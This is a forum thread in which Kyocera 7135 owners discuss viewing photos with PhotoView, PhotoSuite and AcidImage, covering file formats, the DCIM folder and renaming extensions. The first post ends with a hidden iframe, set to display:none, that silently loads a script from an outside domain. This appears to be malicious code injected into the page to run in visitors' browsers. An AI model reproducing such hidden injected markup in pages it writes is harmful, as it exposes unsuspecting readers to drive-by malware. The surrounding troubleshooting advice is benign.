+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: Using PhotoView

Using PhotoView

I'm trying to use Photoview for images on the SD card but when I start the app it responds "No image on memory card". I'm using PhotoSuite to load the images and checking the External Card box in the User ID window before I sync. Any suggestions? I can find the images on the card using File Manager and they are identified as .pdb files.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PhotoView cannot read .pdb files. The .pdb files can only be read by PhotoSuite on the 7135 but I think the files have to be on the 7135 itself and not the expansion card. If you want to view pictures on your phone from the expansion card, they need to be in .jpg format and stored in a directory named DCIM. You can just copy them to the card using a card reader. You also need to have PhotoView installed on the 7135. If it's not already, you need to run the PhotoSuite install from the CD and along the way it asks if you want to install PhotoView.

There are other photo viewer programs out there, but this is how the stock stuff works.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

O.k., I have a similar problem. All of the photos I currently have on my pc which I want to transfer to the 7135 are in JPEG format, which I know won't work with PhotoSuite. Is there any way to convert these pics to .jpg format so they will be viewable? Thanks.

p.s. Have had the 7135 for 5 days now and LOVE IT!!!

PhotoSuite reads .pdb files from the palm
    PhotoView reads .jpg files from the expansion card

If you have a .jpeg file on a PC, you can change the extension to .jpg.

Glad you're loving the 7135. It's a cool tool. Unfortunately, the documentation sucks!
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

O.K., here's another dumb question. How do I change the file extension from .jpeg to .jpg on my pc? I tried "rename" but it doesn't give me the option of changing the file extensio. Thanks.

I suspect you have the "Hide extensions for known file types" checked. It's "protecting" you from accidently changing the file extension. If you're using Windows XP, go to MY COMPUTER. On the menu toolbar, select TOOLS -> FOLDER OPTIONS -> VIEW
    Under the FILES AND FOLDERS heading, you will see the "Hide extensions for known file types". Uncheck the box. Now, find your JPEG file. It should be "yourfile.JPEG" Rename this file to "yourfile.jpg" That should do it.

falstaffpac

Where can I find PhotoView. I read elsewhere on this board that there's an option to install it from the Kyocera CD.
    Since I'm on a Mac and that there's barely anything on the CD for Mac, I tried installing the Media Player part through Virtual PC, hoping to find the PhotoView prc, unfortunately it was nowhere to be found.
    Thanks for your help.

Originally posted by mathieuf
    Where can I find PhotoView. I read elsewhere on this board that there's an option to install it from the Kyocera CD.
    Since I'm on a Mac and that there's barely anything on the CD for Mac, I tried installing the Media Player part through Virtual PC, hoping to find the PhotoView prc, unfortunately it was nowhere to be found.
    Thanks for your help.
    It's made by MGI Soft (now Roxio). I used Google and found PhotoView.prc on the Web. Let me know if you have trouble.

i use photosuite and i can put the photos on the card,i have about 60 photos under photosuite on the card, and i keep about 10 in the main memory for quick viewing,the ones on the card can take almost 2 minutes to load and so i keep some for quick viewing on the palm,i just convert them with photosuite,then sync them to the card,you need to keep a copy of photo suite on the card as well as in main memory to do it this way
    B.Andrew "Andy" Brown,MSW
    Executive Director,Camp Livingston.Inc

just went from 7135 to 6315.

photoview / photo suite

I believe photosuite looks for photos on the card in the launcher directory. It can look in the launcher directory on the card or on the palm internal memory. You change between them by hitting the icon at the top.

Also, if you want to view jpg and you don't have photo view, the downloadable demo for snappermail comes with a jpeg viewer that is a basic viewer that works well. You can download Acidimage or an other viewer demo to see what you like best.

Photosuite and direct copy to card

Has anyone been able to copy the pdb pictures directly to and SD card (via card reader) and get photosuite to find them?

It seems like the only way to get a picture (pdb) to the card and have photosuite recognize it in the launcher directory there, is to use the hotsync conduit (send it from photosuite mobile manager on pc). It must be updating the PhotoSuiteEDB.pdb file in the card's launcher directory ONLY when it hotsyncs (unable to do so with a refresh?).

Photosuite is also very slow and seems like nothing but a waste of ROM, but I'm not about to "Jack" around with my Rom.
    Last edited by Alaska7135er; 08-11-2004 at 02:35 AM.

Palm Desktop Photos

[i]...If you want to view pictures on your phone from the expansion card, they need to be in .jpg format and stored in a directory named DCIM. ... [/B]
    Hi, I have been trying to locate this DCIM directory on my card, but I can't see it anywhere.Using X-Launcher's file manager. all I see is: Launcher, Programs, EIS Download, Backup, but no DCIM..

I am trying to create my own backgrounds for Palmary Clock screen saver and it only accepts "sequential" jpegs (whatevert that means..) vs. progresive jpegs. Is that the diference between "jpg" and "JPEG"? Will renaming the file do it?

I used to have the Palm Photos on my PC, but I deleted it since I started using Photo Suite. Now I can't find where to download it from again...I need it in order to create the correct file type for the Palmary clock to see it.

Many questions- I know Thanks for the help

Snowboarder10

Photos

Hi
    I downloaded so pics to an sd card, how do I view on my 7135. I open photosuite , however they aren't there.
    Thanks

Good place for Bill Gates SilvrDrgn's Avatar

Re: Photos

Originally posted by budd
    Hi
    I downloaded so pics to an sd card, how do I view on my 7135. I open photosuite , however they aren't there.
    Thanks
    They need to be converted by the desktop application first, and then synced in through its conduit. I believe they end up in the /Palm/Launcher directory on the card.
    Michael

pictures

How do i view pictures, photo suite but read somewhere that photo view is what i need. well it did not come with my cd.i downloaded it but can't get it to install. i'm new at this.how do i view my pics?please give details on how and any installs i need to do. thanks

Ignore using the photoview or photosuite first of all... they for lack of a better word, suck for a variety of reasons. As you may have read already, Photosuite requires the photos to be converted and loaded on the plam they both are slow displying the images. Get AcidImage or Splash photo. They will read the image files from the SD card in just about any graphics format.
    mg
    Luck is where opportunity meets preparation.

I agree that Photosuite is a poor .jpg viewer because it has no controls, no thumbnails, is very slow, and , at least on my 7135, doesn't always work (it frequently freezes part way through painting the photo on the screen).

PhotoSuite seems to work well and quickly, but on my 7135 the images are not completely compressed to fit on the screen. There is a part of the image both vertically and horizontally that is off the screen but can be seen by touching the stylus to the screen and moving the image around. I guess my first question is, is this normal for PhotoSuite? My second question is, will AcidImage eliminate this problem?

Yes Acid Image will allow you to both view and pan an image. In addition you won't have to convert an image to a PDB file just to view it on the 7135 as you would with Photosuite.
    mg
    Luck is where opportunity meets preparation.

PhotoSuite stinks. AcidImage works great. If you want to store a lot of images, save them as compressed .jpg files on your SD card, using your favorite image software (e.g. iPhoto or GraphicConverter for Mac users like me).

AcidImage will actually load huge jpegs (even several megabytes) and somehow it will very quickly pan and zoom this image (despite the slow speed of the 7135 processor), but it takes a long time (several minutes) to do the initial loading of huge jpegs. Still this is worthwhile if you have (for example) a map file where you don't want to lose resolution.

If you just want snapshots of your kids, dogs, etc. then save them as lower resolution jpegs, say about 50K in size. Still it might take 15 seconds to load. If you have enough of space on your SD card, save the pics as uncompressed .bmp files. I prefer to save as as 320 x 320 16-bit color, so I can do some panning and zooming on the 160 x 160 screen. Size is about 200Kbytes per pic. They'll load very quickly since there is no decompression to do. Good for slide shows of the kids/dogs.

Thanks for the additional info on AcidImage and how to use it. However, I really did not get answers to either one of my original questions:

1)Is it normal for PhotoSuite to overscan the image so that the borders are not visible without panning the image, or is there some setting or preference that can be changed to eliminate this problem?

2) Will AcidImage display the complete image with no overscan?